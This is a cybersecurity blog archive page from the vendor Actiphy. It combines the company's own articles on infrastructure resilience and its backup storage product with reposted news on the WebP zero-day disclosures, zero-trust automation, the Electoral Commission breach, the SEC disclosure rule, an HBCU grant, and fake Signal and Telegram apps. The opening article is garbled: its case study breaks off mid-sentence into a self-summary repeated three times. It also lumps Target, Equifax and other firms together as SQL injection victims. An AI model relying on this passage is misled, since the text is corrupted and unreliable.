Actiphy

The Anatomy of a Resilient Infrastructure: Mitigating Risks and Ensuring Protection

The Anatomy of a Resilient Infrastructure: Mitigating Risks and Ensuring Protection

The Anatomy of a Resilient Infrastructure: Mitigating Risks and Ensuring Protection

Introduction

Organisations must take a multifaceted approach to secure their digital assets in an era of rapidly evolving cyber threats. This comprehensive article delves deep into the labyrinth of infrastructure security, examining its various components: the software layer, the hardware layer, and advanced security measures. The endgame here is to arm organisations with the knowledge to construct a resilient infrastructure that is adept at mitigating present-day risks and future-proofed against emerging threats.

The Software Layer: Where Complexity Meets Vulnerability

The Ever-Evolving Landscape of Software Vulnerabilities

Introduction

The software layer is a complex beast, continually evolving and presenting new challenges and vulnerabilities. In the current digital milieu, this layer is the cornerstone for productivity and vulnerability. Think of it as an advanced game of chess, where strategic manoeuvring isn’t just a matter of choice but an absolute necessity.

The Risks

Navigating this layer goes beyond patching holes and staying compliant with industry standards. We’re looking at an escalating landscape of zero-day exploits, advanced persistent threats (APTs), and increasingly sophisticated malware campaigns. The digital realm is a battlefield where new tactics emerge from the adversary almost daily.

Real-World Case Study

In 2019, a financial services company based in Australia was compliant with ISO/IEC 27001. The article discusses the importance of a multifaceted approach to secure digital assets. It highlights the significance of a resilient infrastructure that can mitigate present-day risks and future-proof against emerging threats. The article delves into the complexities of the software layer, the cornerstone of both productivity and vulnerability. It provides real-world case studies demonstrating the value of a proactive stance towards security. The article offers insights into the nuanced challenges of creating a secure software layer, such as keeping a keen eye on changes in software updates that can inadvertently open up new attack vectors. The article concludes with the importance of taking a strategic and technological approach to security and understanding the specific nuances of an organisation’s software stack for comprehensive security. The article discusses the importance of a multifaceted approach to secure digital assets. It highlights the significance of a resilient infrastructure that can mitigate present-day risks and future-proof against emerging threats. The article delves into the complexities of the software layer, the cornerstone of both productivity and vulnerability. It provides real-world case studies demonstrating the value of a proactive stance towards security. The article offers insights into the nuanced challenges of creating a secure software layer, such as keeping a keen eye on changes in software updates that can inadvertently open up new attack vectors. The article concludes with the importance of taking a strategic and technological approach to security and understanding the specific nuances of an organisation’s software stack for comprehensive security. The article discusses the importance of a multifaceted approach to secure digital assets. It highlights the significance of a resilient infrastructure that can mitigate present-day risks and future-proof against emerging threats. The article delves into the complexities of the software layer, the cornerstone of both productivity and vulnerability. It provides real-world case studies demonstrating the value of a proactive stance towards security. The article offers insights into the nuanced challenges of creating a secure software layer, such as keeping a keen eye on changes in software updates that can inadvertently open up new attack vectors. The article concludes with the importance of taking a strategic and technological approach to security, understanding the specific nuances of an organisation’s software stack for comprehensive security, and successfully thwarting a ransomware attack. How did they do it? Their defence strategy consisted of next-generation antivirus software, further strengthened by an up-to-date intrusion detection system. This incident underlines the value of a proactive stance compared to other organisations that only react post-compromise, often when it’s too late.

The Solutions

While traditional rule-based security mechanisms offer a certain level of protection, they must be more adequate to counter sophisticated attacks. Next-gen software solutions are the way forward, with capabilities like real-time threat intelligence, behavioural analytics, and deep integration with globally recognised frameworks like the NIST Cybersecurity Framework.

Old Tech vs. New Tech

It’s essential to understand that traditional antivirus solutions were engineered for a different era. They are generally rule-based and are not designed to tackle modern threats like APTs. Contrast this with state-of-the-art Endpoint Detection and Response (EDR) solutions like CrowdStrike’s Falcon, which utilises behavioural analytics to identify abnormal behaviour, offering more robust security mechanisms.

Brands and Why Choose Them

For a good reason, cloud-native platforms are gaining significant traction in the security landscape. Solutions like CrowdStrike’s Falcon, built on a cloud-native architecture, enable automated threat hunting and expedited incident response. This dynamism dramatically reduces the time required to identify, mitigate, and recover from security incidents, giving organisations the upper hand in the relentless cyber warfare game.

The Nuanced Challenges

Every organisation’s software stack blends old and new, a mix of legacy systems and modern solutions. These nuances make it critical for security teams to understand their specific environments in-depth. It’s like having a comprehensive map of the landscape you are defending.

A Deeper Dive into Software Update Challenges

Updates to software layers can be a double-edged sword. While they often introduce new features and patches for known vulnerabilities, they can also inadvertently open up new attack vectors. Security teams must keep a keen eye on these changes, practising a proactive rather than a reactive approach to security.

Concluding Thoughts on the Software Layer

Creating a secure software layer is a continuous process requiring a mix of technological prowess, strategic insight, and real-world practicality. Organisations should aim not only to understand the inherent risks in their software but also to stay updated on emerging threats and security solutions.

The Hardware Layer: The Silent Guardian of Cybersecurity

Introduction

While software takes much of the limelight in cybersecurity discussions, hardware’s role as the first line of defence is often underestimated. Think of hardware as a medieval fortress’s physical walls and fortifications—absolutely crucial but easy to overlook until it’s too late.

The Risks

The hardware layer is prone to a myriad of physical and digital threats. While digital attacks like malware and ransomware often make headlines, physical threats like fire, flooding, and unauthorised access can be equally devastating. The need for more attention to these risks can spell catastrophe for organisations.

The Solutions

Today’s hardware solutions have come a long way. Multi-tiered physical security features, like biometric authentication and advanced fire-suppression systems, offer added layers of security. These features typically align with international standards like ISO/IEC 27001, providing an added layer of assurance.

Old Tech vs. New Tech

Traditional hardware solutions, like RAID configurations, were somewhat reliable in the past but are increasingly prone to failure. On the other hand, Modern Software-Defined Storage (SDS) solutions offer advanced features like automated failover and data replication, providing far more resilience against physical and digital threats.

Brands and Why Choose Them

Choosing the proper hardware is critical, and there’s no one-size-fits-all solution here. Companies like Dell EMC offer hardware solutions that provide up.

To military-grade security, others like Cisco focus more on network-centric hardware security solutions. A blend of these might offer the most comprehensive security infrastructure.

Additional Considerations

The effectiveness of your hardware layer can be severely compromised if it’s not seamlessly integrated with your software and procedural protocols. An excellent firewall can only do so much if your team is unaware of how to manage and maintain it properly.

Concluding Thoughts on the Hardware Layer

Securing your hardware is just as crucial as safeguarding your software. Combining state-of-the-art hardware solutions with best practices like regular patch management can go a long way in building a resilient cybersecurity posture.

Advanced Security Measures: Going the Extra Mile

The Sophistication of Modern Cyber Threats

Introduction

It’s abundantly clear that in the kaleidoscope of modern cybersecurity, basic measures just won’t cut it anymore. The digital realm is flooded with advanced and sophisticated threats like spear-phishing, SQL injections, and Cross-Site Scripting (XSS) attacks, which can quickly bypass traditional security measures.

The Risks

As cyber threats become more sophisticated, the level of risk escalates correspondingly. It’s no longer about protecting against viruses and malware; the threat landscape now includes highly targeted attacks that can cripple an organisation’s operations and reputation.

Real-World Case Study

Target, Yahoo, Zappos, Equifax, Epic Games, TalkTalk, LinkedIn, and Sony Pictures fell victim to a SQL injection attack. The financial repercussions were massive, not to mention the erosion of consumer trust and the cost of remediation.

The Solutions

Several measures can effectively counter advanced threats, including adherence to comprehensive guidelines like the OWASP Top Ten. Next-generation firewalls, Data Loss Prevention (DLP) systems, and behavioural analytics tools offer additional security layers.

Old Tech vs. New Tech

Although effective to an extent, traditional firewalls need more sophistication to deal with current threats. Next-gen firewalls with features like Deep Packet Inspection (DPI) offer a far more nuanced approach to threat detection and prevention.

Brands and Why Choose Them

Companies like Palo Alto Networks and Fortinet offer cutting-edge, machine learning-powered solutions that proactively adapt to evolving threats. When it comes to advanced security measures, choosing a brand that invests in R&D can make a significant difference.

The Human Factor

The most advanced tech solutions can only be effective if the human element is addressed. Human error, negligence, or ignorance can introduce significant vulnerabilities, making ongoing training and awareness initiatives critical.

Advanced Security Considerations

When considering advanced security measures, it’s also crucial to consider additional elements like multi-factor authentication, encryption, and secure code reviews. These are no longer ‘good-to-have’ features but essential layers of a resilient cybersecurity strategy.

Concluding Thoughts on Advanced Security Measures

In today’s cyber environment, where risks are continually evolving, taking your security measures to the next level is not just advisable—it’s imperative. Integrating advanced technologies and adherence to robust security frameworks can significantly boost an organisation’s resilience against modern threats.

Conclusion and Final Thoughts

Building a resilient infrastructure involves far more than installing the latest antivirus or implementing a firewall. It’s a multi-layered challenge that demands a carefully orchestrated blend of state-of-the-art technology, best practices, and human vigilance. Each layer—software, hardware, and advanced security measures—offers challenges and solutions. By developing a nuanced understanding of each, organisations can not only mitigate immediate threats but also prepare for future uncertainties.

In a world where digital transformation is no longer a choice but a necessity, there is no room for complacency. By fortifying every layer of their infrastructure with proactive, robust, and technologically advanced measures, organisations can build a genuinely resilient framework that can withstand the relentless onslaught of modern cyber threats.

The Anatomy of a Resilient Infrastructure: Mitigating Risks and Ensuring Protection Read More »

Incomplete disclosures by Apple and Google create “huge blindspot” for 0-day hunters | Ars Technica

Incomplete disclosures by Apple and Google create “huge blindspot” for 0-day hunters | Ars Technica

Incomplete information included in recent disclosures by Apple and Google reporting critical zero-day vulnerabilities under active exploitation in their products has created a “huge blindspot” that’s causing a large number of offerings from other developers to go unpatched, researchers said Thursday.

Two weeks ago, Apple reported that threat actors were actively exploiting a critical vulnerability in iOS so they could install espionage spyware known as Pegasus. The attacks used a zero-click method, meaning they required no interaction on the part of targets. Simply receiving a call or text on an iPhone was enough to become infected by the Pegasus, which is among the world’s most advanced pieces of known malware.

“Huge blindspot”

Apple said the vulnerability, tracked as CVE-2023-41064, stemmed from a buffer overflow bug in ImageIO, a proprietary framework that allows applications to read and write most image file formats, which include one known as WebP. Apple credited the discovery of the zero-day to Citizen Lab, a research group at the University of Toronto’s Munk School that follows attacks by nation-states targeting dissidents and other at-risk groups.

Four days later, Google reported a critical vulnerability in its Chrome browser. The company said the vulnerability was what’s known as a heap buffer overflow that was present in WebP. Google went on to warn that an exploit for the vulnerability existed in the wild. Google said that the vulnerability, designated as CVE-2023-4863, was reported by the Apple Security Engineering and Architecture team and Citizen Lab.

Further Reading

Rather than Apple, Google, and Citizen Lab coordinating and accurately reporting the common origin of the vulnerability, they chose to use a separate CVE designation, the researchers said. The researchers concluded that “millions of different applications” would remain vulnerable until they, too, incorporated the libwebp fix. That, in turn, they said, was preventing automated systems developers use to track known vulnerabilities in their offerings from detecting a critical vulnerability that’s under active exploitation.

“Since the vulnerability is scoped under the overarching product containing the vulnerable dependency, the vulnerability will only be flagged by vulnerability scanners for these specific products,” Rezillion researchers Ofri Ouzan and Yotam Perkal wrote. “This creates a HUGE blindspot for organizations blindly relying on the output of their vulnerability scanner.”

Google has further come under criticism for limiting the scope of CVE-2023-4863 to Chrome rather than in libwebp. Further, the official description describes the vulnerability as a heap buffer overflow in WebP in Google Chrome.

In an email, a Google representative wrote: “Many platforms implement WebP differently. We do not have any details about how the bug impacts other products. Our focus was getting a fix out to the Chromium community and affected Chromium users as soon as possible. It is best practice for software products to track upstream libraries they depend on in order to pick up security fixes and improvements.”

The representative noted that the WebP image format is mentioned in its disclosure and the official CVE page. The representative didn’t explain why the official CVE and Google’s disclosure did not mention the widely used libwebp library or the likelihood that other software was also likely to be vulnerable.

The Google representative didn’t answer a question asking if CVE-2023-4863 and CVE-2023-41064 stemmed from the same vulnerability. Citizen Lab and Apple didn’t respond to emailed questions before this story went live.

This content was originally published here.

Incomplete disclosures by Apple and Google create “huge blindspot” for 0-day hunters | Ars Technica Read More »

Rethinking Backup Storage: An In-Depth Look at Actiphy StorageServer™

Rethinking Backup Storage: An In-Depth Look at Actiphy StorageServer™

Raising the Bar in Backup Storage: The Actiphy StorageServer™ Advantage

If you’re an IT pro, you already know that protecting your data goes beyond just making backups; it’s also about where and how you’re storing those backups. Let’s introduce you to a next-level game-changer in this realm: Actiphy StorageServer™. Here, we’ll unpack its key features and discuss how it sets a new industry standard, distinguishing itself from competitors like Veeam and ShadowProtect.

Unbreachable Backup Storage: More than Just a Safety Deposit Box

The key to Actiphy StorageServer™’s prowess lies in its seamless integration with ActiveImage Protector™. It offers a secure and unique destination for all your backup needs. What really makes it shine? Its architecturally engineered design that’s highly resilient against ransomware. Instead of relying on a conventional network share, it creates an isolated “bucket” on the destination server, significantly mitigating the risk of falling victim to ransomware.

Turbocharged Performance: Redefining Backup Speed and Reliability

Gone are the days of settling for sluggish HDD read/write speeds. Actiphy StorageServer™ employs cache devices like USB SSDs to bypass this bottleneck. Our tests have shown that leveraging these cache devices amps up the backup speed six-fold compared to conventional methods.

Next-Gen Data Transmission: QUIC, Unbreakable, and Blazing Fast

Tech enthusiasts, take note: Actiphy StorageServer™ employs the QUIC protocol for data transmission. It’s not just about velocity—it’s also about providing ultra-reliable and hyper-secure communication channels. When data integrity is your top priority, Actiphy redefines the rules of the game.

One Size Doesn’t Fit All: Multi-Platform Support

Whether you’re rooted in a Windows, Linux, or Docker environment, Actiphy StorageServer™ offers a flexible approach to meet your operating system requirements.

Control Room: The Intuitive Web Console

Though the server demands are minimal, don’t underestimate the power of its web console. Packed with robust features such as real-time monitoring, intuitive bucket management, and cache device configurations, it ensures you always have the upper hand.

Extra Goodies:

  • Event Monitoring: Keep tabs on client connections and task statuses through real-time logs.
  • Alerts: Stay informed with email notifications for specific events, fortified with SSL/TSL support.
  • Symbiotic Relationship: Crafted to operate in unison with ActiveImage Protector™.

Final Takeaway

Actiphy StorageServer™ is the ultimate solution for IT experts who are serious about elevating their backup storage strategy. With its potent combination of speed, security, and adaptability, it’s the smart choice for those looking to step up their data protection game.

Keep pace with breakthroughs like these. Subscribe to our newsletter and follow us on social media for real-time updates and insights.


Interested in learning more? Stay ahead of the curve by subscribing to our newsletter and following us on social media, 

Rethinking Backup Storage: An In-Depth Look at Actiphy StorageServer™ Read More »

“Embrace cybersecurity automation and orchestration, but in moderation,” says my puppy | VentureBeat

"Embrace cybersecurity automation and orchestration, but in moderation," says my puppy | VentureBeat

An automatic dog feeder seemed like a good idea at the time. One of our team members had a COVID puppy, Mango, who ate constantly, and their kids had long abandoned the promises to help. All was good until a malfunction dumped a pound of dog food on Mango mid-feed. The “brave” puppy was too scared to eat from it again.

What does this have to do with cybersecurity? It illustrates the importance of automation and orchestration as they are pillars of proper cybersecurity architecture. But it highlights that there can also be unforeseen risks to consider.

Successful, secure digital transformation requires an automation and orchestration mindset. Humans are not capable of keeping pace with the amount of data, threats and the ever-increasing sophistication of attackers who are leveraging their own automation strategies. As one embarks on zero trust, this becomes even more critical. Automation and orchestration are foundational to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) Zero Trust Maturity Model.

But what does automation and orchestration mean in the context of cybersecurity? We’ll start with some definitions. Automation refers to using technology to automatically perform tasks or actions that humans previously did manually. Orchestration, on the other hand, refers to integrating and coordinating different tools and technologies to create a unified security platform. In the case of the automatic pet feeder, automation would be dispensing food at scheduled times, while orchestration would be aligning feeding times with Mango’s dietary needs and ordering more food when supplies went low.

Automation and orchestration in a zero-trust architecture

How are these practices implemented? As suggested earlier, automation can simplify the enforcement of security policy. Take, for example, the manual process of application segmentation in the context of a zero-trust architecture. Zero trust is a security model that assumes that all users, devices and applications are untrusted and must be verified before granting access to resources and then only grants what is needed by the business — moving away from implicit trust, hence the term “zero trust.” Thus, moving to zero trust allows for granular application segmentation policies that grant access based on business policies.

This is powerful, but creating these rules manually can be difficult and time-consuming. The first step is having the visibility to be able to understand the landscape and what is happening in the environment to set up proper segmentation policies. This was discussed in more depth in this article.

But next comes the processes of creating, maintaining and enforcing the segmentation rules, which will rely heavily on automation techniques coupled with AI/ML insight to create recommendations based on actual usage. It could say, for example, that visibility shows that only the finance department accesses a critical financial software package, even though the entire company has access. It could then automate the creation of a segmentation rule thereby reducing the attack surface by removing unnecessary trust in the environment.

In a zero-trust world, the network stack and the network itself have been removed from the attack surface, leaving effectively the zero-trust platform (like an SSE architecture), the endpoint and identities as the reduced enterprise attack surface. This means that tools like SSE, EDRs and IDPs might each employ automation for efficiency but need orchestration among them.

Take, for example, the previous case where an automatically created segmentation policy only grants access to an application to the finance department. What if the EDR could spot risky behaviour from an employee in the finance department whose device also wasn’t up to security standards? Orchestration between the EDR and SSE would limit access (either a block, limited access or isolated browser access) to the important financial application. In a more radical example, deception could be brought into play with lures that a legitimate employee in finance would never find or use but an attacker might, and automation could immediately send a signal to the security operations team and also create a false application with false data for the attacker to access.

Automation allows for the quick and efficient deployment of security policies, essential for enforcing the zero-trust model. By automating the deployment of security policies, security teams can ensure that access is only granted to authorized users and devices. Orchestration enables security teams to automate workflows and processes across different security tools, allowing them to quickly and efficiently respond to security incidents. In Mango’s case, these techniques did provide her with food on time and reduced the burden on her owners.

Where things get complicated

So what are the challenges? Automation and orchestration are fine when it is done incrementally and strategically, but they can potentially be used by an attacker even when they don’t know the specific pages of the playbook or code of the automated scripts. With an intelligent opponent and given multiple opportunities to attack and learn from one another, automation that can be seen and triggered intentionally can be exploited. This is seen in the fraud world, where large volumes of fraudulent transactions give real-time feedback to cyber criminals: when something is effective, it is noted and used again immediately with swarm-like intensity.

There are three general principles to employ when using automation and orchestration to minimize these risks and maximize the gains in efficiency, cost reduction, and security effectiveness:

Overall, automation and orchestration are critical components of a strong cybersecurity strategy. Arguably, they may be necessary to grow in maturity and handle advanced threats at scale. But the real goal is business transformation: network, application, and security. This mentality will enable us to focus on that and get on with that transformation. Automation and orchestration are vital qualities of a large-scale zero-trust platform, and as we’ve seen, they have to be done in a way that minimizes the ability of adversaries to abuse and turn them on the defenders.

After all, accidentally dropping a pound of dog food on my puppy is one thing, but hacking the dispenser and shooting dog food at Mango is completely unacceptable! Used correctly, these methods will serve us, enable secure digital transformation and maybe help ease the burden on puppies and their owners.

To see how Zscaler is helping its customers reduce business risk, improve user productivity and reduce cost and complexity, visit https://www.zscaler.com/platform/zero-trust-exchange

Sanjit Ganguli is VP Transformation Strategy & Field CTO at Zscaler. Sam Curry is VP, CISO at Zscaler. Nathan Howe is VP Emerging Technology at Zscaler.

This content was originally published here.

About Actiphy and Cybersecurity: As the digital landscape continually evolves, the importance of robust cybersecurity measures cannot be overstated. Actiphy provides a comprehensive suite of solutions designed to address the multifaceted challenges of today’s cybersecurity environment. From data backup to rapid system recovery, our tools are designed with a proactive approach to safeguarding your digital assets. In the context of automation and orchestration, Actiphy’s solutions can seamlessly integrate with your existing systems, enhancing their efficiency and reducing vulnerabilities. Learn more about how Actiphy is championing secure digital transformations by visiting our solutions page.

“Embrace cybersecurity automation and orchestration, but in moderation,” says my puppy | VentureBeat Read More »

Navigating the Future of Data Protection with Richard Giddey, VP APAC at Actiphy

Future of Data Protection infographic

Navigating the Future of Data Protection

Introduction

Welcome back to our ongoing series on the evolving landscape of data protection. I'm Richard Giddey, your navigator through this complex but critical domain. Today, we will dissect the vital relationship between cybersecurity and data protection and why you can't effectively have one without the other.


The Inseparable Duo: Cybersecurity and Data Protection

Understanding The Bond

In an era of cyber threats like ransomware and data breaches, cybersecurity is not a standalone concept but is deeply interwoven with data protection. Both play essential roles in safeguarding an organisation’s most valuable asset—data.


The Anatomy of a Resilient Infrastructure

Hardware and Software Synergy
The bedrock of a resilient infrastructure lies in the symbiotic relationship between hardware and software. While robust servers and data storage solutions are key, they must be complemented by agile software solutions capable of mitigating real-time security risks. For instance, next-gen antivirus software can detect anomalies that traditional firewalls may overlook.

Layered Security: The Pillars of Defence
Effective security is like a well-designed fortress comprising multiple layers, each serving a specific function. Firewalls may serve as the moat, but intrusion detection systems act as the watchtowers, ever vigilant against new cyber threats. Regular security audits and updates keep the fortress standing tall.

Employee Training: The First Line of Defence
The human element is one of the most overlooked aspects of a resilient infrastructure. No amount of sophisticated hardware or software can compensate for a poorly trained staff susceptible to social engineering attacks.


Bridging the Protection Gap: Backup Strategies

Beyond Traditional Backup
Gone are the days when backup strategies were solely meant for accidental deletions or hardware failures. With the rise of ransomware attacks, a backup is often the last line of defence. Modern backup solutions offer features like real-time monitoring and encryption to ensure your data is retrievable and secure even in a cyberattack.


Keeping an Eye on Regulatory Requirements

In a world where data sovereignty and privacy issues are under intense scrutiny, being aware of and compliant with the current legislation is not optional but mandatory.


Concluding Thoughts

We live in an era where cybersecurity and data protection are converging rapidly...

A Brief Introduction
I am Richard Giddey, the Vice President for the Asia-Pacific region at Actiphy. With a history spanning more than two decades in storage, backup, and data protection, I've been involved in the APAC market through various roles, including co-founding the APAC division of StorageCraft and holding key positions at Exabyte Tape.

My Journey and Motivation for this Series
This blog series emanates from my passion for solving real-world data protection challenges and extensive experience in this field. It aims to provide actionable insights and clear guidance to navigate this complex area. I invite you to stay tuned for our next piece, "Modern Data Protection: What to Look for in 2023 and Beyond."

Navigating the Future of Data Protection with Richard Giddey, VP APAC at Actiphy Read More »

Electoral Commission failed cybersecurity test in same year as hack | Electoral Commission | The Guardian

Electoral Commission failed cybersecurity test in same year as hack | Electoral Commission | The Guardian

The Electoral Commission has admitted it failed a cybersecurity test in the same year hackers successfully attacked the organisation.

The UK’s elections watchdog said it did not pass a Cyber Essentials test, a voluntary government-backed scheme that assesses an organisation’s readiness against cyber-attacks.

The commission said it failed the test in 2021, when it was breached by an unknown assailant.

The organisation revealed last month that it had been the subject of a “complex cyber-attack” that resulted in hackers accessing reference copies of the electoral registers, equating to the names and addresses of 40 million people. It said the attack started in August 2021 but was not detected until October 2022.

The commission said it did not pass the test due to two issues unrelated to the hack: an earlier version of Windows software on some laptops and a dated version of staff mobiles. It said those problems were not linked to the attack, which affected the organisation’s email servers.

“We are always working to improve our cybersecurity and systems. We draw on the expertise of the National Cyber Security Centre – as many public bodies do – to continue to develop and progress protections against cyber-threats. We regularly seek guidance and feedback on our systems to deal with the continued risk of cyber-threats as they evolve and take different forms. We welcome these learnings and act on them,” said an Electoral Commission spokesperson.

Sign up to First Edition

Our morning email breaks down the key stories of the day, telling you what’s happening and why it matters

The Cyber Essentials website states that the scheme is important because vulnerability to basic attacks marks organisations out as targets for “more in-depth unwanted attention from cyber criminals and others”.

This content was originally published here.

Electoral Commission failed cybersecurity test in same year as hack | Electoral Commission | The Guardian Read More »

Proposed SEC Cybersecurity Rule Will Put Unnecessary Strain on CISOs

Proposed SEC Cybersecurity Rule Will Put Unnecessary Strain on CISOs

In March 2022, the Securities and Exchange Commission (SEC) proposed a rule on cybersecurity disclosure, governance, and risk management for public companies, known as the Proposed Rule for Public Companies (PRPC). This rule would require companies to report “material” cybersecurity incidents within four days. It would also require that boards of directors have cybersecurity expertise.

Unsurprisingly, it’s being met with all sorts of pushback. In its current form, the proposed rule leaves a lot of room for interpretation, and it’s impractical in some areas.

For one, the tight disclosure window will put massive amounts of pressure on chief information security officers (CISOs) to disclose material incidents before they have all the details. Incidents can take weeks and sometimes months to understand and fully remediate. It is impossible to know the impact of a new vulnerability until ample resources are dedicated to remediation. CISOs may also end up having to disclose vulnerabilities that, with more time, end up being less of an issue and therefore not material. That, could in turn affect the short-term price of a company.

Incidents Are a Living Thing — Not a One-and-Done Deal

Four-day disclosure requirements might sound fine at face value. But they are not realistic and will ultimately distract CISOs from putting out fires.

I’ll use the European Union’s General Data Protection Regulation (GDPR) as a comparison. Under the regulation, companies must report incidents of non-compliance within 72 hours. However, In the case of GDPR, the need to report is well-defined. While 72 hours is often too soon to know the specifics of an incident’s overall impact, organizations at the very least will know if personal information has been compromised.

Compare this with the PRPC’s proposed disclosure requirements. Organizations will have an extra 24 hours, but — based on what’s been publicized thus far — they must qualify internally if the breach is material. Under GDPR, a company can do that based on the sensitivity of the data, its volume, and where it went. Under PRPC, “materiality” is defined by the SEC as anything that a “reasonable shareholder would consider important.” This could be virtually anything shareholders consider material to their business. It’s rather broad and not clearly defined.

Other Weak Definitions

Another issue is the proposal’s requirement to disclose circumstances in which a security incident was not material on its own but has become so “in aggregate.” How does this work in practice? Is an unpatched vulnerability from six months ago now in scope for disclosure (given that the company didn’t patch it) if it’s used to extend the scope of a subsequent incident? We already conflate threats, vulnerabilities, and business impact. A vulnerability that isn’t exploited isn’t material because it doesn’t create a business impact. What will you need to disclose when aggregate incidents need to be reported, and does the aggregation clause make this even harder to discern?

To make this more complicated, the proposed rule will require organizations to disclose any policy changes that resulted from previous incidents. How rigorously will this be measured and, honestly, why do it? Policies are supposed to be statements of intent — they’re not supposed to be low-level, forensic configuration guides. Updating a lower-level document (a standard) to mandate a specific encryption algorithm for sensitive data makes sense, but there are few higher-level docs that would be updated due to an incident. Examples might be requiring multifactor authentication or changing the patching service-level agreement (SLA) for in-scope critical vulnerabilities.

Lastly, the proposal says quarterly earnings reports will be the forum for disclosures. Personally, quarterly earnings calls don’t seem like the right forum to go deep on policy updates and security incidents. Who will give the updates? The CFO or CEO, who typically provides earnings reports, might not be sufficiently informed to give those critical reports. So, does the CISO now join the calls? And, if so, will they also respond to questions from financial analysts? It all seems impractical, but we’ll have to wait and see.

Questions About Board Experience

The first iteration of PRPC required disclosures about board oversight of cybersecurity risk management policies. This included disclosures about the individual board members and their respective cyber expertise. The SEC says it purposefully kept the definition broad, given the range in skill and experience particular to each board.

Luckily, after much scrutiny, they decided to remove this requirement. PRPC does still call for companies to describe the board’s process for overseeing cybersecurity risks, and management’s role in handling those risks.

This will require some adjustments in communication and general awareness. Recently, Dr. Keri Pearlson, executive director of cybersecurity at MIT Sloan, and Lucia Milică, CISO at Stanley Black & Decker, surveyed 600 board members about activities surrounding cybersecurity. They found that “fewer than half (47%) of members serve on boards that interact with their CISOs regularly, and almost a third of them only see their CISOs at board presentations.” This clearly points to a communications gap.

The good news is most boards already have an audit and risk committee, which can serve as a subset of the board for this purpose. That said, it’s not uncommon for CISOs and CSOs to present matters involving cybersecurity that the rest of the board doesn’t fully understand. To close this gap, there needs to be greater alignment between the board and security executives.

Uncertainty Prevails

As with any new regulation, there are questions and uncertainties with PRPC. We’ll just have to wait and see how it all evolves and whether companies can meet the proposed requirements.

This content was originally published here.

Proposed SEC Cybersecurity Rule Will Put Unnecessary Strain on CISOs Read More »

National Cybersecurity Alliance Receives 200K Grant From Craig Newmark Philanthropies for HBCU Cybersecurity Program

National Cybersecurity Alliance Receives 200K Grant From Craig Newmark Philanthropies for HBCU Cybersecurity Program

August 28, 2023- WASHINGTON – The National Cybersecurity Alliance (NCA) today announced it has received a significant boost in funding from Craig Newmark Philanthropies. The $200,000 grant will support ongoing initiatives within NCA’s Historically Black Colleges and Universities (HBCU) Cybersecurity Career, Mentoring, and Scholarship Program, as students return to school.

Launched in 2022, the ‘See Yourself In Cyber’ HBCU Career Program equips students with the necessary skills to navigate the search process for positions in security and builds a pipeline to black cybersecurity talent. The program provides HBCU students access to ongoing mentorship opportunities, on-campus career events featuring keynotes, panels and workshops, and a recently launched scholarship program to ensure equitable access and advancements within the cybersecurity and tech careers. 

“We extend our heartfelt appreciation to Craig Newmark Philanthropies for their generous support,” stated Lisa Plaggemier, Executive Director of the National Cybersecurity Alliance. “This funding will enable us to expand the ‘See Yourself in Cyber’ Program, empowering students from underrepresented backgrounds to break into and excel in the rapidly evolving cybersecurity sector.”

NCA will use the grant to bolster its 2023-2024 program with strategic investments in guest lecturers and curriculum development; student training, certification, and job placement; and developing real-world experiences via internship opportunities. In addition, a portion of the grant will be committed to producing virtual events, amplifying the programs’ overall reach and impact. 

“I am proud to support the National Cybersecurity Alliance in their mission to empower underrepresented students with the tools and opportunities to succeed in the cybersecurity field,” said Craig Newmark, founder of Craig Newmark Philanthropies and craigslist. “This program exemplifies the positive impact that education and mentorship can have on building a diverse and skilled workforce.”

In the last year, ‘See Yourself in Cyber’ has made remarkable strides toward fostering education, engagement, and mentorship for HBCU students. Through generous donations from organizations like Craig Newmark Philanthropies, the program will continue to expand its role in addressing the critical shortage of cybersecurity professionals while championing diversity and inclusivity.

To stay updated on the ‘See Yourself in Cyber’ HBCU Cybersecurity Career, Mentoring, and Scholarship Program and learn more about the National Cybersecurity Alliance, please visit NCA’s official website.

To learn more about our valued partners and how to become a sponsor, please visit NCA’s HBCU Cybersecurity Career Program webpage.

About National Cybersecurity Alliance

The National Cybersecurity Alliance is a non-profit organization on a mission to create a more secure,interconnected world. We advocate for the safe use of all technology and educate everyone on how best to protect ourselves, our families, and our organizations from cybercrime. We create strong partnerships between governments and corporations to amplify our message and to foster a greater “digital” good. National Cybersecurity Alliance’s core efforts include Cybersecurity Awareness Month (October); Data Privacy Day (Jan. 28); and CyberSecure My Business™, which offers webinars, web resources and workshops to help businesses be resistant to and resilient from cyberattacks. For more information, please visit https://staysafeonline.org.

About Craig Newmark Philanthropies

Craig Newmark is a Web pioneer, philanthropist, and leading advocate. Most commonly known for founding the online classified ads service craigslist, Newmark works to support and connect people and drive broad civic engagement. In 2016, he founded Craig Newmark Philanthropies to help and protect the people who protect our country. At its core, all of Newmark’s philanthropic work helps to strengthen American democracy by supporting the values that the country aspires to – fairness, opportunity, and respect. For more information, please visit: CraigNewmarkPhilanthropies.org. Craig can be found sharing his personal perspective on the issues of the day at @craignewmark.

This content was originally published here.

National Cybersecurity Alliance Receives 200K Grant From Craig Newmark Philanthropies for HBCU Cybersecurity Program Read More »

Fake Signal and Telegram apps sneak malware into thousands of Android phones — delete these right now | Tom’s Guide

Fake Signal and Telegram apps sneak malware into thousands of Android phones — delete these right now | Tom's Guide

Hackers have developed a sneaky new tactic to push malware onto your phone and snoop on your conversations. Researchers at the cybersecurity firm ESET found fake apps in the Google and Samsung app stores that posed as extensions or premium versions of the popular messaging platforms Signal and Telegram designed to steal user data. 

The malicious apps, called Signal Plus Messenger and FlyGram, could pull sensitive information from legitimate Signal and Telegram accounts, including call logs, SMS messages, locations and more, when users took certain actions.

Here’s how it works: Signal and Telegram enable users to link the mobile app to their other devices, such as their desktop or one of the best tablets. These malicious apps leverage this feature to automatically connect a compromised device to the attacker’s Signal, allowing them to spy on their communications while the user is none the wiser. 

Google and Samsung have removed both apps from their respective app stores, but not before they racked up thousands of downloads. Signal Plus Messenger went live on the Play Store in July 2022 and was downloaded roughly 100 times before Google took it down in April in response to a tip from ESET, according to a report from The Hacker News. An app called FlyGram received 5,000 downloads after launching on the Play Store in June 2020 before its removal the next year. 

How to protect your Android phone

That the discovery of this stealthy “auto-linking” capability has largely gone unnoticed until now is particularly concerning. If you have either Signal Plus Messenger and FlyGram downloaded on your Android phone, you should uninstall them immediately. To keep your phone safe moving forward, it’s important to download only the legitimate versions of Signal and Telegram, as well as periodically check Settings > Linked Devices to make sure no unrecognized devices pop up.

